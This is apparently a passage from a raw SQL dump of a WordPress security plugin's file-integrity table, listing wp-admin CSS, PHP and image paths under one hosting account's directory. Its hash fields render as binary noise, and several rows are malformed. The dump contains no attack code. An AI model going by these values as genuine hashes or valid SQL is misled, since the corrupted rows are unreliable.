G,','',0,'?'),('7OW\n@a','wp-admin/css/colors/modern/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' x ] vx','W g@+Y*\'But8\0l','',0,'?'),('n1.ÓutlX','wp-admin/css/colors/modern/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-+f8\0','OR{zJLQMpfw&Œ ','',0,'?'),('_q ^<8: ','wp-admin/css/colors/modern/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jɰ>0g','\')53)֯y(+^','',0,'?'),('\"< it &','wp-admin/css/colors/modern/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H=cU9V3P2 \ZS','\nxs\0vJQ=ݬB{{6','',0,'?'),('<(*A]O','wp-admin/css/colors/ocean/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bs2@!R&*','n&+b|lV!^F6','',0,'?'),('{^WC','wp-admin/css/colors/ocean/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fگ\n','VnfXl2\0ٍOe\"a֘t','',0,'?'),('Ê5ff;,G!\'\'-','wp-admin/css/colors/ocean/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mF8\n8prX\0;9t%','%`EmjxZk! \r4','',0,'?'),('*Tu\r~m','wp-admin/css/colors/ocean/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r>9b@','޹iaF0(`|h&6=/','',0,'?'),('-Ǹ%w=','wp-admin/css/colors/ocean/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=A$ocV','33g(u2-*6{j=Pg0M}','',0,'?'),('j׻q.*;2','wp-admin/css/colors/sunrise/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0.E(<.r','rO/V\\cA+s ҨZ','',0,'?'),('2jL,W\rW$','wp-admin/css/colors/sunrise/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','22n$Qi>','GV]Ίhe x͑ʍ: _l','',0,'?'),('y85æb','wp-admin/css/colors/sunrise/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#E*4.ȪH','z/P^?ۘ%_oQxw|cu3','',0,'?'),('-+emu\"x','wp-admin/css/colors/sunrise/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]t]je','m 4%ٟH30','',0,'?'),('p96èR','wp-admin/css/common.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Dn:29Vs','N(sv46^̻>&T{5','',0,'?'),('\rvN[B&SL','wp-admin/css/common.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h aZҗ7\06','pGJ̣.lat?(rC%','',0,'?'),('Vk9۴sֿ','wp-admin/css/customize-controls-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*XZk؝','^)\n*\ZOv˯03~LyC','',0,'?'),('pj֛`w','wp-admin/css/customize-controls-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tn\0\rzɓbC-','sTyZJYn>','t2nP:5$O3\r','',0,'?'),(']\"}[YR','wp-admin/css/edit-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%3}w$ ','6nY$up#d4cj','',0,'?'),('BH*mzN83','wp-admin/css/edit-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\\\':_Oue_S','&48|vi;h}C)Д\n','',0,'?'),('\r::HH:d','wp-admin/css/edit.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JEls; H','O3!yZqRIc@`F/fjS','',0,'?'),(',o!zj\"','wp-admin/css/edit.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ѫYApOg\ZQ','Idr]Fԥ,Y\\R/ y0_','',0,'?'),('6;I(Hm%f','wp-admin/css/farbtastic-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\n){','T=Y#[vrHiaR','',0,'?'),('OXg] ?{','',0,'?'),('«-j=uN\\q\'','wp-admin/css/farbtastic.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8)}{Ch2U','|ALMbxd8XjX.^\n\Z','',0,'?'),('KnҋD&sRWU(','wp-admin/css/farbtastic.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#^:G( :k\n','47Vf /DW3p','',0,'?'),('OlqCcێ','wp-admin/css/forms-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>>\n\04׿','+hA[Ajht/ƒ]','',0,'?'),('{]\\ֵ d','wp-admin/css/forms-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xx:oqF','7IA1Tӂs/Vښ','',0,'?'),('(%#9yn','wp-admin/css/forms.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Poh','ha.+ G~rVuuQ1]L','',0,'?'),('łjDߋ.˖D','wp-admin/css/forms.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZbR۴c(I4>','=0c*s9$LLʛGOo&(c','',0,'?'),('w9=_ \"h%v','wp-admin/css/install-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/install-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.9\"OY\\','}KYJޘPrdZ_Gu*XrH d','',0,'?'),('ʆnD㮖(','wp-admin/css/install.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2}!㴢','V\ng\\QOF|s\\~µ=G&B','',0,'?'),('\'-p- f','wp-admin/css/l10n-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|sA',']%FL\nILlf426G\'','',0,'?'),('vâ,\\+Q֧','wp-admin/css/l10n-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OSGfK罚8]','dxk3rްVNĪet-','',0,'?'),('2Die','wp-admin/css/l10n.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĸP)|qr','wppS\"D.oMOmO\'baNj0','',0,'?'),('H4.\\:#','wp-admin/css/l10n.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.[H\rϬ.k/ ','lgj-u\\$?)\\y6@','',0,'?'),('y%Ǻ~ne\"V','wp-admin/css/list-tables-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CY]7O','f\0CPBHhf ','',0,'?'),('F%C0,','wp-admin/css/list-tables-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Wwa','#V:r8^ے\"b;\'mwhs','',0,'?'),('|jx7(Q}0\'','wp-admin/css/list-tables.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AW%','Ci<cXLmṚ=,q','',0,'?'),(' kLN\0x6@','wp-admin/css/list-tables.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b2`dfC1J','a:H|L+\0Qp^(UM#r@w','',0,'?'),('A{& V>Νs','wp-admin/css/login-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8=lMGs3,V$','j\n\'/L9\r=kjԊWl','',0,'?'),('h@Z%RF;ti\\m','wp-admin/css/login-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u%T@v~>','Ne̲xD>!V?&W\"7ҀON','',0,'?'),('|jX|fb','wp-admin/css/login.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k|(MZ','pnDluDe9-5 J7?','',0,'?'),('`&锥~K3/d','wp-admin/css/login.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\οu+0k\\if','7|o@i%tG)V\0X%P','',0,'?'),('r\nb#','wp-admin/css/media-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?$. ПH~`\0','܋=񄘑~X+ ClmX|v','',0,'?'),('zݿ&X❙6s','wp-admin/css/media-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jR)4w@d','U: P1!x&e|?%','',0,'?'),('TDFK1','wp-admin/css/media.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F.0xszR','#3K\0rg8\'0gBd\"0j','',0,'?'),('%Pb.8Gdt','wp-admin/css/media.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ws5K','e\"L\";rI0A۶l','',0,'?'),('\Zy8R#Oy','wp-admin/css/nav-menus-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',tʧ~: Z@H','DDhJI\"tvr;4N\ZrZ!yY','',0,'?'),(' D 2K|&','wp-admin/css/nav-menus-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\=&Z25',' ylelPb5Pb*U\nّpˍz7','',0,'?'),('qhn Jj','wp-admin/css/nav-menus.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q`+|ry+','ALG D481T','',0,'?'),('ZWtpNh','wp-admin/css/nav-menus.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&eyiȔ!TU','QoiXUҥj|\'W9,V`','',0,'?'),('PhrV','wp-admin/css/revisions-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o$o |{ Z\'','jU zMɸ g;ܲeg<1u`p','',0,'?'),('@tR>GHhס','wp-admin/css/revisions-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!^#֜*X!4Q',' w/,fЁu9y ][tH6/','',0,'?'),(' a\"KwTbc1S','wp-admin/css/revisions.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@t$`j&s',' $bfoQtR+Azz','',0,'?'),('\nGƙn\Z@1+U]','wp-admin/css/revisions.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/revisions.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؾ§Ae]Er ','Ȟpf͑(`^Ɣ4P7@','',0,'?'),('r{\Zk\"k','wp-admin/css/site-health-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TF7w-[P\n','נuM@`9X=Ƽo','',0,'?'),('6ZfM ;','wp-admin/css/site-health-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','  (u\r','\n\ZVp;tFu\'\"','',0,'?'),('b񪥲K+xwF','wp-admin/css/site-health.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Y ;m~','=12dKη*JcN(}jd&If','',0,'?'),('v6^AA/],6\'y:','wp-admin/css/site-health.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9_rs\\t|G;','wb2\"%:kց3R!Sw0 NOK','',0,'?'),('0rH\"YK]T','wp-admin/css/site-icon-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' LDR *','Yin >j#KN%8TPO_,','',0,'?'),('QWsA7d\n','wp-admin/css/site-icon-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`_?ބ=|+d','MS>j/ \"K%qޣ~','',0,'?'),('\'=!ZaajUQ','wp-admin/css/site-icon.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Ep0lu','i>œӺ#&2Z\'K(*','',0,'?'),('n&n!崬','wp-admin/css/site-icon.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lˁxJTG','+WV3(qFr;|^@','',0,'?'),('g~w\Zhh','wp-admin/css/themes-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wmMkh,x',' N F:SW)S[)d1K}aS ','',0,'?'),('5At߂m0iz','wp-admin/css/themes-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H$vx^\'','xֻ 5\\~n{ӆp~5H','',0,'?'),('Rш޿0','wp-admin/css/themes.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j RtRv~f','|4cV>DL\r.Mmb_}q','',0,'?'),('fSuBͥ?^yO','wp-admin/css/themes.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܹGu7\0Ҳ','<:7״WO7R^!','',0,'?'),('3vU\Z3P^O ','wp-admin/css/widgets-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iY \rG\\','e99K5bYz.Dh.)\'93Ox','',0,'?'),('sEΞqpB','wp-admin/css/widgets-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kl)T2K/ ',') Gc~mbx܂ʉT','',0,'?'),('!HUN&\"z','wp-admin/css/widgets.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%QMQ=9}5GM)&','1\rϺL%-|g ','',0,'?'),('E}~M-]a','wp-admin/css/widgets.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.U\\޾u','\'f=~:Ǟՙ\0eĒ\"3+','',0,'?'),('֗]NRS{qv?','wp-admin/css/wp-admin-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i[p]<','r5SE?29/)_PJvVhR','',0,'?'),('$(g(P/','wp-admin/css/wp-admin-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GQ5\'EYo0}_','0|TFO  ..>CEj','',0,'?'),('d4j2 UV$P','wp-admin/css/wp-admin.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7#Q&M?»|[','QD6hPqqM9FO \\O','',0,'?'),('j0wE}®R','wp-admin/css/wp-admin.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eUpʓHWtP!H','^E-R\'#?lemL0kU@','',0,'?'),('?0|5uơ','wp-admin/custom-background.php','/home/tummmyov/tummyrevolution.com/wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫]0m7d','Z5\"=\0Tσqr/0QX^dn6','',0,'?'),('uqg\Z\08hԭ\0','wp-admin/custom-header.php','/home/tummmyov/tummyrevolution.com/wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y&','Θ4Cw@XdoN=w<~o','',0,'?'),(';?2S\0p','wp-admin/customize.php','/home/tummmyov/tummyrevolution.com/wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֢|Q2n','D5MTj.|&pk\0I[','',0,'?'),('p?E^@\'PE','wp-admin/edit-comments.php','/home/tummmyov/tummyrevolution.com/wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' WF\rB;','s\"|ڰy,o?daME\nJQ5/','',0,'?'),('\rb\\ɍ\Z','wp-admin/edit-form-advanced.php','/home/tummmyov/tummyrevolution.com/wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!4\"g|sSv','wWZj%꺣NS}|\Z7','',0,'?'),('592^%<','wp-admin/edit-form-blocks.php','/home/tummmyov/tummyrevolution.com/wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`TKFto','I9j@s o','QIJ1 濪Lɢr(','',0,'?'),('\nb-V:|m','wp-admin/edit-link-form.php','/home/tummmyov/tummyrevolution.com/wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$3g[vj','JXA0_\\4l޹p,-:','',0,'?'),('% 8^V&','',0,'?'),('djق(-IJ','wp-admin/images/about-header-contribute.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/about-header-contribute.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\Z\0\ny$5 #','-Ӏi{=\Z]IӸ?x_M<','',0,'?'),('prY/i??','wp-admin/images/about-header-credits.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/about-header-credits.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R2IG<w\'9','el%oѴm3VޡبSs?','',0,'?'),('=>\0U s\n /U/By?\0','',0,'?'),('(QNEy:B','wp-admin/images/about-header-privacy.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/about-header-privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7떚<21/@',' oIڞ\"04NϨ','',0,'?'),('YsMѨwk','wp-admin/images/about-release-badge.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/about-release-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n!{I?،','+\'3O_h>jH#|?3','',0,'?'),('%|-X2`JV','wp-admin/images/about-texture.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/about-texture.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0m{oQKU','J>\\ˌk~2r!!ti+\0','',0,'?'),('W\"Sk:','wp-admin/images/align-center-2x.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-r5*J7If','8tf*JwT^H>1JDο','',0,'?'),('&*dĆָ H5','wp-admin/images/align-center.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \Zݶ4ydY1e','놽N3X!ljh`hA]J','',0,'?'),('V9KgoX7','wp-admin/images/align-left-2x.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i8O^c','$kb> k&: ڂa7Zcdm%','',0,'?'),('mMtWB','wp-admin/images/align-left.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\y0dZo.h','_]<#S\"B^U4_Qr]lWx','V: h#ȆBT5i\0?cBc','',0,'?'),('tnRؔ%^','wp-admin/images/align-right.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BOe#l@:P+\"v','ɳC ?=&UyZ31!>Y','YW( N32U;<.iDd!','',0,'?'),('DS3.įy};','wp-admin/images/browser-rtl.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"ӠA\Z%̝','+啧0pƜJMk qwXب','',0,'?'),('ŽH06','wp-admin/images/browser.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','žK\\b$F','&$ĉ9~_SH_̓%L\'&','',0,'?'),('G9q=ʥ[3?a','wp-admin/images/bubble_bg-2x.gif','/home/tummmyov/tummyrevolution.com/wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭqj\nX<','n%4L6{/Т[Ĭ?XW_A.r','',0,'?'),('QuoPX\0Sڞ','wp-admin/images/bubble_bg.gif','/home/tummmyov/tummyrevolution.com/wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~g<ćI0','\'+uW`-A S\'}S~Sb','',0,'?'),('Lt593u^)','wp-admin/images/comment-grey-bubble-2x.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TYŝ2s,\rm','DxT-wN P{','',0,'?'),('ebWA0d','wp-admin/images/comment-grey-bubble.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y*\'tF','7 y񮌬U{ԟ`]m','',0,'?'),('Ҭ@>]','wp-admin/images/contribute-code.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/contribute-code.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']![#FNf\"','r^Tdy0TuǸ=$]wi9','',0,'?'),('#6~ A^R!','wp-admin/images/contribute-main.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/contribute-main.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y53VݞgIs','Ud6Z HqH5i_@0K˝S]','',0,'?'),('+[|p;','wp-admin/images/contribute-no-code.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/contribute-no-code.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eH5\'N1$','+\0#ƅ6|zWsU.Zbp`','',0,'?'),('v)+/ ~Z%iV','wp-admin/images/dashboard-background.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/dashboard-background.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[H\rkgyjKOM','c.K.h|M=ʀ0RϭD','',0,'?'),('I\\jxg','wp-admin/images/date-button-2x.gif','/home/tummmyov/tummyrevolution.com/wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?a09JQ\Z','*Q _(G:*ηd.','',0,'?'),('a\'@T瑓','wp-admin/images/date-button.gif','/home/tummmyov/tummyrevolution.com/wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$\n-潮LT','hŵδ䘼n$q!I#','',0,'?'),('(s3TNo(','wp-admin/images/freedom-1.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/freedom-1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F \ZPz','\"Wbd!siK?Efy','',0,'?'),('ڤ& MKQo?','wp-admin/images/freedom-2.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/freedom-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[J#Tqfu* ','UEkkl8)H !a-)YB,H ,X','',0,'?'),('~*޿S̙e ','wp-admin/images/freedom-3.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/freedom-3.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ݐTk⴦,',')NM!9RN9!\ZLx+KQ','',0,'?'),('9\\4;J;u~','wp-admin/images/freedom-4.svg','/home/tummmyov/tummyrevolution.com/wp-admin/images/freedom-4.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<= ;`IIMҔ','zU 3E.o6gS6w MW`d$','',0,'?'),('j%Mɍp)Z ','wp-admin/images/generic.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'[#98 !','{uK[g͆Ex{:߼lͨG','',0,'?'),('\Z{g?3gڢ\Z','wp-admin/images/icons32-2x.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%*g','#!$@0g.;i3%!cHP=','',0,'?'),('&N,6P','wp-admin/images/icons32-vs-2x.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*04G4F &Zi}\"','.a}hw6WEʭ(3Jӭ9E','',0,'?'),('L Ufu<','wp-admin/images/icons32-vs.png','/home/tummmyov/tummyrevolution.com/wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',P*{>vUf','?UzP\\ 